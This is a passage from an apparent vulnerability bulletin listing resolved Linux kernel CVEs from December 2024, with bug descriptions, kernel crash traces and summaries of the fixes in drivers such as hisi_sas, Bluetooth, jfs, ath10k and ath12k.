mutex_unlock[jt]+0xc4 __mutex_unlock_slowpath+0xd4 wake_up_q+0x70 try_to_wake_up[jt]+0x48c preempt_schedule_common+0x28 __schedule+0x628 __switch_to+0x174 el0t_64_sync+0x1a8/0x1ac el0t_64_sync_handler+0x68/0xbc el0_svc+0x38/0x68 do_el0_svc+0x1c/0x28 el0_svc_common+0x80/0xe0 invoke_syscall+0x58/0x114 __arm64_sys_read+0x1c/0x2c ksys_read+0x78/0xe8 vfs_read+0x1e0/0x2c8 kernfs_fop_read_iter+0x68/0x1b4 seq_read_iter+0x158/0x4ec kernfs_seq_show+0x44/0x54 sysfs_kf_seq_show+0xb4/0x130 dev_attr_show+0x38/0x74 brightness_show+0x20/0x4c dualshock4_led_get_brightness+0xc/0x74 [ 3313.874295][ T4013] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000060 [ 3313.874301][ T4013] Mem abort info: [ 3313.874303][ T4013] ESR = 0x0000000096000006 [ 3313.874305][ T4013] EC = 0x25: DABT (current EL), IL = 32 bits [ 3313.874307][ T4013] SET = 0, FnV = 0 [ 3313.874309][ T4013] EA = 0, S1PTW = 0 [ 3313.874311][ T4013] FSC = 0x06: level 2 translation fault [ 3313.874313][ T4013] Data abort info: [ 3313.874314][ T4013] ISV = 0, ISS = 0x00000006, ISS2 = 0x00000000 [ 3313.874316][ T4013] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 3313.874318][ T4013] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 3313.874320][ T4013] user pgtable: 4k pages, 39-bit VAs, pgdp=00000008f2b0a000 .. [ 3313.874332][ T4013] Dumping ftrace buffer: [ 3313.874334][ T4013] (ftrace buffer empty) .. .. [ dd3313.874639][ T4013] CPU: 6 PID: 4013 Comm: InputReader [ 3313.874648][ T4013] pc : dualshock4_led_get_brightness+0xc/0x74 [ 3313.874653][ T4013] lr : led_update_brightness+0x38/0x60 [ 3313.874656][ T4013] sp : ffffffc0b910bbd0 .. .. [ 3313.874685][ T4013] Call trace: [ 3313.874687][ T4013] dualshock4_led_get_brightness+0xc/0x74 [ 3313.874690][ T4013] brightness_show+0x20/0x4c [ 3313.874692][ T4013] dev_attr_show+0x38/0x74 [ 3313.874696][ T4013] sysfs_kf_seq_show+0xb4/0x130 [ 3313.874700][ T4013] kernfs_seq_show+0x44/0x54 [ 3313.874703][ T4013] seq_read_iter+0x158/0x4ec [ 3313.874705][ T4013] kernfs_fop_read_iter+0x68/0x1b4 [ 3313.874708][ T4013] vfs_read+0x1e0/0x2c8 [ 3313.874711][ T4013] ksys_read+0x78/0xe8 [ 3313.874714][ T4013] __arm64_sys_read+0x1c/0x2c [ 3313.874718][ T4013] invoke_syscall+0x58/0x114 [ 3313.874721][ T4013] el0_svc_common+0x80/0xe0 [ 3313.874724][ T4013] do_el0_svc+0x1c/0x28 [ 3313.874727][ T4013] el0_svc+0x38/0x68 [ 3313.874730][ T4013] el0t_64_sync_handler+0x68/0xbc [ 3313.874732][ T4013] el0t_64_sync+0x1a8/0x1ac | 2024-12-27 | not yet calculated | CVE-2024-56587 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: scsi: hisi_sas: Create all dump files during debugfs initialization For the current debugfs of hisi_sas, after user triggers dump, the driver allocate memory space to save the register information and create debugfs files to display the saved information. In this process, the debugfs files created after each dump. Therefore, when the dump is triggered while the driver is unbind, the following hang occurs: [67840.853907] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000a0 [67840.862947] Mem abort info: [67840.865855] ESR = 0x0000000096000004 [67840.869713] EC = 0x25: DABT (current EL), IL = 32 bits [67840.875125] SET = 0, FnV = 0 [67840.878291] EA = 0, S1PTW = 0 [67840.881545] FSC = 0x04: level 0 translation fault [67840.886528] Data abort info: [67840.889524] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 [67840.895117] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [67840.900284] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [67840.905709] user pgtable: 4k pages, 48-bit VAs, pgdp=0000002803a1f000 [67840.912263] [00000000000000a0] pgd=0000000000000000, p4d=0000000000000000 [67840.919177] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP [67840.996435] pstate: 80400009 (Nzcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [67841.003628] pc : down_write+0x30/0x98 [67841.007546] lr : start_creating.part.0+0x60/0x198 [67841.012495] sp : ffff8000b979ba20 [67841.016046] x29: ffff8000b979ba20 x28: 0000000000000010 x27: 0000000000024b40 [67841.023412] x26: 0000000000000012 x25: ffff20202b355ae8 x24: ffff20202b35a8c8 [67841.030779] x23: ffffa36877928208 x22: ffffa368b4972240 x21: ffff8000b979bb18 [67841.038147] x20: ffff00281dc1e3c0 x19: fffffffffffffffe x18: 0000000000000020 [67841.045515] x17: 0000000000000000 x16: ffffa368b128a530 x15: ffffffffffffffff [67841.052888] x14: ffff8000b979bc18 x13: ffffffffffffffff x12: ffff8000b979bb18 [67841.060263] x11: 0000000000000000 x10: 0000000000000000 x9 : ffffa368b1289b18 [67841.067640] x8 : 0000000000000012 x7 : 0000000000000000 x6 : 00000000000003a9 [67841.075014] x5 : 0000000000000000 x4 : ffff002818c5cb00 x3 : 0000000000000001 [67841.082388] x2 : 0000000000000000 x1 : ffff002818c5cb00 x0 : 00000000000000a0 [67841.089759] Call trace: [67841.092456] down_write+0x30/0x98 [67841.096017] start_creating.part.0+0x60/0x198 [67841.100613] debugfs_create_dir+0x48/0x1f8 [67841.104950] debugfs_create_files_v3_hw+0x88/0x348 [hisi_sas_v3_hw] [67841.111447] debugfs_snapshot_regs_v3_hw+0x708/0x798 [hisi_sas_v3_hw] [67841.118111] debugfs_trigger_dump_v3_hw_write+0x9c/0x120 [hisi_sas_v3_hw] [67841.125115] full_proxy_write+0x68/0xc8 [67841.129175] vfs_write+0xd8/0x3f0 [67841.132708] ksys_write+0x70/0x108 [67841.136317] __arm64_sys_write+0x24/0x38 [67841.140440] invoke_syscall+0x50/0x128 [67841.144385] el0_svc_common.constprop.0+0xc8/0xf0 [67841.149273] do_el0_svc+0x24/0x38 [67841.152773] el0_svc+0x38/0xd8 [67841.156009] el0t_64_sync_handler+0xc0/0xc8 [67841.160361] el0t_64_sync+0x1a4/0x1a8 [67841.164189] Code: b9000882 d2800002 d2800023 f9800011 (c85ffc05) [67841.170443] ---[ end trace 0000000000000000 ]--- To fix this issue, create all directories and files during debugfs initialization. In this way, the driver only needs to allocate memory space to save information each time the user triggers dumping. | 2024-12-27 | not yet calculated | CVE-2024-56588 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: scsi: hisi_sas: Add cond_resched() for no forced preemption model For no forced preemption model kernel, in the scenario where the expander is connected to 12 high performance SAS SSDs, the following call trace may occur: [ 214.409199][ C240] watchdog: BUG: soft lockup - CPU#240 stuck for 22s! [irq/149-hisi_sa:3211] [ 214.568533][ C240] pstate: 60400009 (nZCv daif +PAN -UAO -TCO BTYPE=--) [ 214.575224][ C240] pc : fput_many+0x8c/0xdc [ 214.579480][ C240] lr : fput+0x1c/0xf0 [ 214.583302][ C240] sp : ffff80002de2b900 [ 214.587298][ C240] x29: ffff80002de2b900 x28: ffff1082aa412000 [ 214.593291][ C240] x27: ffff3062a0348c08 x26: ffff80003a9f6000 [ 214.599284][ C240] x25: ffff1062bbac5c40 x24: 0000000000001000 [ 214.605277][ C240] x23: 000000000000000a x22: 0000000000000001 [ 214.611270][ C240] x21: 0000000000001000 x20: 0000000000000000 [ 214.617262][ C240] x19: ffff3062a41ae580 x18: 0000000000010000 [ 214.623255][ C240] x17: 0000000000000001 x16: ffffdb3a6efe5fc0 [ 214.629248][ C240] x15: ffffffffffffffff x14: 0000000003ffffff [ 214.635241][ C240] x13: 000000000000ffff x12: 000000000000029c [ 214.641234][ C240] x11: 0000000000000006 x10: ffff80003a9f7fd0 [ 214.647226][ C240] x9 : ffffdb3a6f0482fc x8 : 0000000000000001 [ 214.653219][ C240] x7 : 0000000000000002 x6 : 0000000000000080 [ 214.659212][ C240] x5 : ffff55480ee9b000 x4 : fffffde7f94c6554 [ 214.665205][ C240] x3 : 0000000000000002 x2 : 0000000000000020 [ 214.671198][ C240] x1 : 0000000000000021 x0 : ffff3062a41ae5b8 [ 214.677191][ C240] Call trace: [ 214.680320][ C240] fput_many+0x8c/0xdc [ 214.684230][ C240] fput+0x1c/0xf0 [ 214.687707][ C240] aio_complete_rw+0xd8/0x1fc [ 214.692225][ C240] blkdev_bio_end_io+0x98/0x140 [ 214.696917][ C240] bio_endio+0x160/0x1bc [ 214.701001][ C240] blk_update_request+0x1c8/0x3bc [ 214.705867][ C240] scsi_end_request+0x3c/0x1f0 [ 214.710471][ C240] scsi_io_completion+0x7c/0x1a0 [ 214.715249][ C240] scsi_finish_command+0x104/0x140 [ 214.720200][ C240] scsi_softirq_done+0x90/0x180 [ 214.724892][ C240] blk_mq_complete_request+0x5c/0x70 [ 214.730016][ C240] scsi_mq_done+0x48/0xac [ 214.734194][ C240] sas_scsi_task_done+0xbc/0x16c [libsas] [ 214.739758][ C240] slot_complete_v3_hw+0x260/0x760 [hisi_sas_v3_hw] [ 214.746185][ C240] cq_thread_v3_hw+0xbc/0x190 [hisi_sas_v3_hw] [ 214.752179][ C240] irq_thread_fn+0x34/0xa4 [ 214.756435][ C240] irq_thread+0xc4/0x130 [ 214.760520][ C240] kthread+0x108/0x13c [ 214.764430][ C240] ret_from_fork+0x10/0x18 This is because in the hisi_sas driver, both the hardware interrupt handler and the interrupt thread are executed on the same CPU. In the performance test scenario, function irq_wait_for_interrupt() will always return 0 if lots of interrupts occurs and the CPU will be continuously consumed. As a result, the CPU cannot run the watchdog thread. When the watchdog time exceeds the specified time, call trace occurs. To fix it, add cond_resched() to execute the watchdog thread. | 2024-12-27 | not yet calculated | CVE-2024-56589 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_core: Fix not checking skb length on hci_acldata_packet This fixes not checking if skb really contains an ACL header otherwise the code may attempt to access some uninitilized/invalid memory past the valid skb->data. | 2024-12-27 | not yet calculated | CVE-2024-56590 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_conn: Use disable_delayed_work_sync This makes use of disable_delayed_work_sync instead cancel_delayed_work_sync as it not only cancel the ongoing work but also disables new submit which is disarable since the object holding the work is about to be freed. | 2024-12-27 | not yet calculated | CVE-2024-56591 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bpf: Call free_htab_elem() after htab_unlock_bucket() For htab of maps, when the map is removed from the htab, it may hold the last reference of the map. bpf_map_fd_put_ptr() will invoke bpf_map_free_id() to free the id of the removed map element. However, bpf_map_fd_put_ptr() is invoked while holding a bucket lock (raw_spin_lock_t), and bpf_map_free_id() attempts to acquire map_idr_lock (spinlock_t), triggering the following lockdep warning: ============================= [ BUG: Invalid wait context ] 6.11.0-rc4+ #49 Not tainted ----------------------------- test_maps/4881 is trying to lock: ffffffff84884578 (map_idr_lock){+...}-{3:3}, at: bpf_map_free_id.part.0+0x21/0x70 other info that might help us debug this: context-{5:5} 2 locks held by test_maps/4881: #0: ffffffff846caf60 (rcu_read_lock){....}-{1:3}, at: bpf_fd_htab_map_update_elem+0xf9/0x270 #1: ffff888149ced148 (&htab->lockdep_key#2){....}-{2:2}, at: htab_map_update_elem+0x178/0xa80 stack backtrace: CPU: 0 UID: 0 PID: 4881 Comm: test_maps Not tainted 6.11.0-rc4+ #49 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), ... Call Trace: <TASK> dump_stack_lvl+0x6e/0xb0 dump_stack+0x10/0x20 __lock_acquire+0x73e/0x36c0 lock_acquire+0x182/0x450 _raw_spin_lock_irqsave+0x43/0x70 bpf_map_free_id.part.0+0x21/0x70 bpf_map_put+0xcf/0x110 bpf_map_fd_put_ptr+0x9a/0xb0 free_htab_elem+0x69/0xe0 htab_map_update_elem+0x50f/0xa80 bpf_fd_htab_map_update_elem+0x131/0x270 htab_map_update_elem+0x50f/0xa80 bpf_fd_htab_map_update_elem+0x131/0x270 bpf_map_update_value+0x266/0x380 __sys_bpf+0x21bb/0x36b0 __x64_sys_bpf+0x45/0x60 x64_sys_call+0x1b2a/0x20d0 do_syscall_64+0x5d/0x100 entry_SYSCALL_64_after_hwframe+0x76/0x7e One way to fix the lockdep warning is using raw_spinlock_t for map_idr_lock as well. However, bpf_map_alloc_id() invokes idr_alloc_cyclic() after acquiring map_idr_lock, it will trigger a similar lockdep warning because the slab's lock (s->cpu_slab->lock) is still a spinlock. Instead of changing map_idr_lock's type, fix the issue by invoking htab_put_fd_value() after htab_unlock_bucket(). However, only deferring the invocation of htab_put_fd_value() is not enough, because the old map pointers in htab of maps can not be saved during batched deletion. Therefore, also defer the invocation of free_htab_elem(), so these to-be-freed elements could be linked together similar to lru map. There are four callers for ->map_fd_put_ptr: (1) alloc_htab_elem() (through htab_put_fd_value()) It invokes ->map_fd_put_ptr() under a raw_spinlock_t. The invocation of htab_put_fd_value() can not simply move after htab_unlock_bucket(), because the old element has already been stashed in htab->extra_elems. It may be reused immediately after htab_unlock_bucket() and the invocation of htab_put_fd_value() after htab_unlock_bucket() may release the newly-added element incorrectly. Therefore, saving the map pointer of the old element for htab of maps before unlocking the bucket and releasing the map_ptr after unlock. Beside the map pointer in the old element, should do the same thing for the special fields in the old element as well. (2) free_htab_elem() (through htab_put_fd_value()) Its caller includes __htab_map_lookup_and_delete_elem(), htab_map_delete_elem() and __htab_map_lookup_and_delete_batch(). For htab_map_delete_elem(), simply invoke free_htab_elem() after htab_unlock_bucket(). For __htab_map_lookup_and_delete_batch(), just like lru map, linking the to-be-freed element into node_to_free list and invoking free_htab_elem() for these element after unlock. It is safe to reuse batch_flink as the link for node_to_free, because these elements have been removed from the hash llist. Because htab of maps doesn't support lookup_and_delete operation, __htab_map_lookup_and_delete_elem() doesn't have the problem, so kept it as ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56592 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: brcmfmac: Fix oops due to NULL pointer dereference in brcmf_sdiod_sglist_rw() This patch fixes a NULL pointer dereference bug in brcmfmac that occurs when a high 'sd_sgentry_align' value applies (e.g. 512) and a lot of queued SKBs are sent from the pkt queue. The problem is the number of entries in the pre-allocated sgtable, it is nents = max(rxglom_size, txglom_size) + max(rxglom_size, txglom_size) >> 4 + 1. Given the default [rt]xglom_size=32 it's actually 35 which is too small. Worst case, the pkt queue can end up with 64 SKBs. This occurs when a new SKB is added for each original SKB if tailroom isn't enough to hold tail_pad. At least one sg entry is needed for each SKB. So, eventually the "skb_queue_walk loop" in brcmf_sdiod_sglist_rw may run out of sg entries. This makes sg_next return NULL and this causes the oops. The patch sets nents to max(rxglom_size, txglom_size) * 2 to be able handle the worst-case. Btw. this requires only 64-35=29 * 16 (or 20 if CONFIG_NEED_SG_DMA_LENGTH) = 464 additional bytes of memory. | 2024-12-27 | not yet calculated | CVE-2024-56593 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: set the right AMDGPU sg segment limitation The driver needs to set the correct max_segment_size; otherwise debug_dma_map_sg() will complain about the over-mapping of the AMDGPU sg length as following: WARNING: CPU: 6 PID: 1964 at kernel/dma/debug.c:1178 debug_dma_map_sg+0x2dc/0x370 [ 364.049444] Modules linked in: veth amdgpu(OE) amdxcp drm_exec gpu_sched drm_buddy drm_ttm_helper ttm(OE) drm_suballoc_helper drm_display_helper drm_kms_helper i2c_algo_bit rpcsec_gss_krb5 auth_rpcgss nfsv4 nfs lockd grace netfs xt_conntrack xt_MASQUERADE nf_conntrack_netlink xfrm_user xfrm_algo iptable_nat xt_addrtype iptable_filter br_netfilter nvme_fabrics overlay nfnetlink_cttimeout nfnetlink openvswitch nsh nf_conncount nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c bridge stp llc amd_atl intel_rapl_msr intel_rapl_common sunrpc sch_fq_codel snd_hda_codec_realtek snd_hda_codec_generic snd_hda_scodec_component snd_hda_codec_hdmi snd_hda_intel snd_intel_dspcfg edac_mce_amd binfmt_misc snd_hda_codec snd_pci_acp6x snd_hda_core snd_acp_config snd_hwdep snd_soc_acpi kvm_amd snd_pcm kvm snd_seq_midi snd_seq_midi_event crct10dif_pclmul ghash_clmulni_intel sha512_ssse3 snd_rawmidi sha256_ssse3 sha1_ssse3 aesni_intel snd_seq nls_iso8859_1 crypto_simd snd_seq_device cryptd snd_timer rapl input_leds snd [ 364.049532] ipmi_devintf wmi_bmof ccp serio_raw k10temp sp5100_tco soundcore ipmi_msghandler cm32181 industrialio mac_hid msr parport_pc ppdev lp parport drm efi_pstore ip_tables x_tables pci_stub crc32_pclmul nvme ahci libahci i2c_piix4 r8169 nvme_core i2c_designware_pci realtek i2c_ccgx_ucsi video wmi hid_generic cdc_ether usbnet usbhid hid r8152 mii [ 364.049576] CPU: 6 PID: 1964 Comm: rocminfo Tainted: G OE 6.10.0-custom #492 [ 364.049579] Hardware name: AMD Majolica-RN/Majolica-RN, BIOS RMJ1009A 06/13/2021 [ 364.049582] RIP: 0010:debug_dma_map_sg+0x2dc/0x370 [ 364.049585] Code: 89 4d b8 e8 36 b1 86 00 8b 4d b8 48 8b 55 b0 44 8b 45 a8 4c 8b 4d a0 48 89 c6 48 c7 c7 00 4b 74 bc 4c 89 4d b8 e8 b4 73 f3 ff <0f> 0b 4c 8b 4d b8 8b 15 c8 2c b8 01 85 d2 0f 85 ee fd ff ff 8b 05 [ 364.049588] RSP: 0018:ffff9ca600b57ac0 EFLAGS: 00010286 [ 364.049590] RAX: 0000000000000000 RBX: ffff88b7c132b0c8 RCX: 0000000000000027 [ 364.049592] RDX: ffff88bb0f521688 RSI: 0000000000000001 RDI: ffff88bb0f521680 [ 364.049594] RBP: ffff9ca600b57b20 R08: 000000000000006f R09: ffff9ca600b57930 [ 364.049596] R10: ffff9ca600b57928 R11: ffffffffbcb46328 R12: 0000000000000000 [ 364.049597] R13: 0000000000000001 R14: ffff88b7c19c0700 R15: ffff88b7c9059800 [ 364.049599] FS: 00007fb2d3516e80(0000) GS:ffff88bb0f500000(0000) knlGS:0000000000000000 [ 364.049601] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 364.049603] CR2: 000055610bd03598 CR3: 00000001049f6000 CR4: 0000000000350ef0 [ 364.049605] Call Trace: [ 364.049607] <TASK> [ 364.049609] ? show_regs+0x6d/0x80 [ 364.049614] ? __warn+0x8c/0x140 [ 364.049618] ? debug_dma_map_sg+0x2dc/0x370 [ 364.049621] ? report_bug+0x193/0x1a0 [ 364.049627] ? handle_bug+0x46/0x80 [ 364.049631] ? exc_invalid_op+0x1d/0x80 [ 364.049635] ? asm_exc_invalid_op+0x1f/0x30 [ 364.049642] ? debug_dma_map_sg+0x2dc/0x370 [ 364.049647] __dma_map_sg_attrs+0x90/0xe0 [ 364.049651] dma_map_sgtable+0x25/0x40 [ 364.049654] amdgpu_bo_move+0x59a/0x850 [amdgpu] [ 364.049935] ? srso_return_thunk+0x5/0x5f [ 364.049939] ? amdgpu_ttm_tt_populate+0x5d/0xc0 [amdgpu] [ 364.050095] ttm_bo_handle_move_mem+0xc3/0x180 [ttm] [ 364.050103] ttm_bo_validate+0xc1/0x160 [ttm] [ 364.050108] ? amdgpu_ttm_tt_get_user_pages+0xe5/0x1b0 [amdgpu] [ 364.050263] amdgpu_amdkfd_gpuvm_alloc_memory_of_gpu+0xa12/0xc90 [amdgpu] [ 364.050473] kfd_ioctl_alloc_memory_of_gpu+0x16b/0x3b0 [amdgpu] [ 364.050680] kfd_ioctl+0x3c2/0x530 [amdgpu] [ 364.050866] ? __pfx_kfd_ioctl_alloc_memory_of_gpu+0x10/0x10 [amdgpu] [ 364.05105 ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-56594 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: jfs: add a check to prevent array-index-out-of-bounds in dbAdjTree When the value of lp is 0 at the beginning of the for loop, it will become negative in the next assignment and we should bail out. | 2024-12-27 | not yet calculated | CVE-2024-56595 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: jfs: fix array-index-out-of-bounds in jfs_readdir The stbl might contain some invalid values. Added a check to return error code in that case. | 2024-12-27 | not yet calculated | CVE-2024-56596 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: jfs: fix shift-out-of-bounds in dbSplit When dmt_budmin is less than zero, it causes errors in the later stages. Added a check to return an error beforehand in dbAllocCtl itself. | 2024-12-27 | not yet calculated | CVE-2024-56597 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: jfs: array-index-out-of-bounds fix in dtReadFirst The value of stbl can be sometimes out of bounds due to a bad filesystem. Added a check with appopriate return of error code in that case. | 2024-12-27 | not yet calculated | CVE-2024-56598 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: ath10k: avoid NULL pointer error during sdio remove When running 'rmmod ath10k', ath10k_sdio_remove() will free sdio workqueue by destroy_workqueue(). But if CONFIG_INIT_ON_FREE_DEFAULT_ON is set to yes, kernel panic will happen: Call trace: destroy_workqueue+0x1c/0x258 ath10k_sdio_remove+0x84/0x94 sdio_bus_remove+0x50/0x16c device_release_driver_internal+0x188/0x25c device_driver_detach+0x20/0x2c This is because during 'rmmod ath10k', ath10k_sdio_remove() will call ath10k_core_destroy() before destroy_workqueue(). wiphy_dev_release() will finally be called in ath10k_core_destroy(). This function will free struct cfg80211_registered_device *rdev and all its members, including wiphy, dev and the pointer of sdio workqueue. Then the pointer of sdio workqueue will be set to NULL due to CONFIG_INIT_ON_FREE_DEFAULT_ON. After device release, destroy_workqueue() will use NULL pointer then the kernel panic happen. Call trace: ath10k_sdio_remove ->ath10k_core_unregister …… ->ath10k_core_stop ->ath10k_hif_stop ->ath10k_sdio_irq_disable ->ath10k_hif_power_down ->del_timer_sync(&ar_sdio->sleep_timer) ->ath10k_core_destroy ->ath10k_mac_destroy ->ieee80211_free_hw ->wiphy_free …… ->wiphy_dev_release ->destroy_workqueue Need to call destroy_workqueue() before ath10k_core_destroy(), free the work queue buffer first and then free pointer of work queue by ath10k_core_destroy(). This order matches the error path order in ath10k_sdio_probe(). No work will be queued on sdio workqueue between it is destroyed and ath10k_core_destroy() is called. Based on the call_stack above, the reason is: Only ath10k_sdio_sleep_timer_handler(), ath10k_sdio_hif_tx_sg() and ath10k_sdio_irq_disable() will queue work on sdio workqueue. Sleep timer will be deleted before ath10k_core_destroy() in ath10k_hif_power_down(). ath10k_sdio_irq_disable() only be called in ath10k_hif_stop(). ath10k_core_unregister() will call ath10k_hif_power_down() to stop hif bus, so ath10k_sdio_hif_tx_sg() won't be called anymore. Tested-on: QCA6174 hw3.2 SDIO WLAN.RMH.4.4.1-00189 | 2024-12-27 | not yet calculated | CVE-2024-56599 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: inet6: do not leave a dangling sk pointer in inet6_create() sock_init_data() attaches the allocated sk pointer to the provided sock object. If inet6_create() fails later, the sk object is released, but the sock object retains the dangling sk pointer, which may cause use-after-free later. Clear the sock sk pointer on error. | 2024-12-27 | not yet calculated | CVE-2024-56600 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: inet: do not leave a dangling sk pointer in inet_create() sock_init_data() attaches the allocated sk object to the provided sock object. If inet_create() fails later, the sk object is freed, but the sock object retains the dangling pointer, which may create use-after-free later. Clear the sk pointer in the sock object on error. | 2024-12-27 | not yet calculated | CVE-2024-56601 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: ieee802154: do not leave a dangling sk pointer in ieee802154_create() sock_init_data() attaches the allocated sk object to the provided sock object. If ieee802154_create() fails later, the allocated sk object is freed, but the dangling pointer remains in the provided sock object, which may allow use-after-free. Clear the sk pointer in the sock object on error. | 2024-12-27 | not yet calculated | CVE-2024-56602 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: af_can: do not leave a dangling sk pointer in can_create() On error can_create() frees the allocated sk object, but sock_init_data() has already attached it to the provided sock object. This will leave a dangling sk pointer in the sock object and may cause use-after-free later. | 2024-12-27 | not yet calculated | CVE-2024-56603 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: RFCOMM: avoid leaving dangling sk pointer in rfcomm_sock_alloc() bt_sock_alloc() attaches allocated sk object to the provided sock object. If rfcomm_dlc_alloc() fails, we release the sk object, but leave the dangling pointer in the sock object, which may cause use-after-free. Fix this by swapping calls to bt_sock_alloc() and rfcomm_dlc_alloc(). | 2024-12-27 | not yet calculated | CVE-2024-56604 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: L2CAP: do not leave dangling sk pointer on error in l2cap_sock_create() bt_sock_alloc() allocates the sk object and attaches it to the provided sock object. On error l2cap_sock_alloc() frees the sk object, but the dangling pointer is still attached to the sock object, which may create use-after-free in other code. | 2024-12-27 | not yet calculated | CVE-2024-56605 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: af_packet: avoid erroring out after sock_init_data() in packet_create() After sock_init_data() the allocated sk object is attached to the provided sock object. On error, packet_create() frees the sk object leaving the dangling pointer in the sock object on return. Some other code may try to use this pointer and cause use-after-free. | 2024-12-27 | not yet calculated | CVE-2024-56606 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: fix atomic calls in ath12k_mac_op_set_bitrate_mask() When I try to manually set bitrates: iw wlan0 set bitrates legacy-2.4 1 I get sleeping from invalid context error, see below. Fix that by switching to use recently introduced ieee80211_iterate_stations_mtx(). Do note that WCN6855 firmware is still crashing, I'm not sure if that firmware even supports bitrate WMI commands and should we consider disabling ath12k_mac_op_set_bitrate_mask() for WCN6855? But that's for another patch. BUG: sleeping function called from invalid context at drivers/net/wireless/ath/ath12k/wmi.c:420 in_atomic(): 0, irqs_disabled(): 0, non_block: 0, pid: 2236, name: iw preempt_count: 0, expected: 0 RCU nest depth: 1, expected: 0 3 locks held by iw/2236: #0: ffffffffabc6f1d8 (cb_lock){++++}-{3:3}, at: genl_rcv+0x14/0x40 #1: ffff888138410810 (&rdev->wiphy.mtx){+.+.}-{3:3}, at: nl80211_pre_doit+0x54d/0x800 [cfg80211] #2: ffffffffab2cfaa0 (rcu_read_lock){....}-{1:2}, at: ieee80211_iterate_stations_atomic+0x2f/0x200 [mac80211] CPU: 3 UID: 0 PID: 2236 Comm: iw Not tainted 6.11.0-rc7-wt-ath+ #1772 Hardware name: Intel(R) Client Systems NUC8i7HVK/NUC8i7HVB, BIOS HNKBLi70.86A.0067.2021.0528.1339 05/28/2021 Call Trace: <TASK> dump_stack_lvl+0xa4/0xe0 dump_stack+0x10/0x20 __might_resched+0x363/0x5a0 ? __alloc_skb+0x165/0x340 __might_sleep+0xad/0x160 ath12k_wmi_cmd_send+0xb1/0x3d0 [ath12k] ? ath12k_wmi_init_wcn7850+0xa40/0xa40 [ath12k] ? __netdev_alloc_skb+0x45/0x7b0 ? __asan_memset+0x39/0x40 ? ath12k_wmi_alloc_skb+0xf0/0x150 [ath12k] ? reacquire_held_locks+0x4d0/0x4d0 ath12k_wmi_set_peer_param+0x340/0x5b0 [ath12k] ath12k_mac_disable_peer_fixed_rate+0xa3/0x110 [ath12k] ? ath12k_mac_vdev_stop+0x4f0/0x4f0 [ath12k] ieee80211_iterate_stations_atomic+0xd4/0x200 [mac80211] ath12k_mac_op_set_bitrate_mask+0x5d2/0x1080 [ath12k] ? ath12k_mac_vif_chan+0x320/0x320 [ath12k] drv_set_bitrate_mask+0x267/0x470 [mac80211] ieee80211_set_bitrate_mask+0x4cc/0x8a0 [mac80211] ? __this_cpu_preempt_check+0x13/0x20 nl80211_set_tx_bitrate_mask+0x2bc/0x530 [cfg80211] ? nl80211_parse_tx_bitrate_mask+0x2320/0x2320 [cfg80211] ? trace_contention_end+0xef/0x140 ? rtnl_unlock+0x9/0x10 ? nl80211_pre_doit+0x557/0x800 [cfg80211] genl_family_rcv_msg_doit+0x1f0/0x2e0 ? genl_family_rcv_msg_attrs_parse.isra.0+0x250/0x250 ? ns_capable+0x57/0xd0 genl_family_rcv_msg+0x34c/0x600 ? genl_family_rcv_msg_dumpit+0x310/0x310 ? __lock_acquire+0xc62/0x1de0 ? he_set_mcs_mask.isra.0+0x8d0/0x8d0 [cfg80211] ? nl80211_parse_tx_bitrate_mask+0x2320/0x2320 [cfg80211] ? cfg80211_external_auth_request+0x690/0x690 [cfg80211] genl_rcv_msg+0xa0/0x130 netlink_rcv_skb+0x14c/0x400 ? genl_family_rcv_msg+0x600/0x600 ? netlink_ack+0xd70/0xd70 ? rwsem_optimistic_spin+0x4f0/0x4f0 ? genl_rcv+0x14/0x40 ? down_read_killable+0x580/0x580 ? netlink_deliver_tap+0x13e/0x350 ? __this_cpu_preempt_check+0x13/0x20 genl_rcv+0x23/0x40 netlink_unicast+0x45e/0x790 ? netlink_attachskb+0x7f0/0x7f0 netlink_sendmsg+0x7eb/0xdb0 ? netlink_unicast+0x790/0x790 ? __this_cpu_preempt_check+0x13/0x20 ? selinux_socket_sendmsg+0x31/0x40 ? netlink_unicast+0x790/0x790 __sock_sendmsg+0xc9/0x160 ____sys_sendmsg+0x620/0x990 ? kernel_sendmsg+0x30/0x30 ? __copy_msghdr+0x410/0x410 ? __kasan_check_read+0x11/0x20 ? mark_lock+0xe6/0x1470 ___sys_sendmsg+0xe9/0x170 ? copy_msghdr_from_user+0x120/0x120 ? __lock_acquire+0xc62/0x1de0 ? 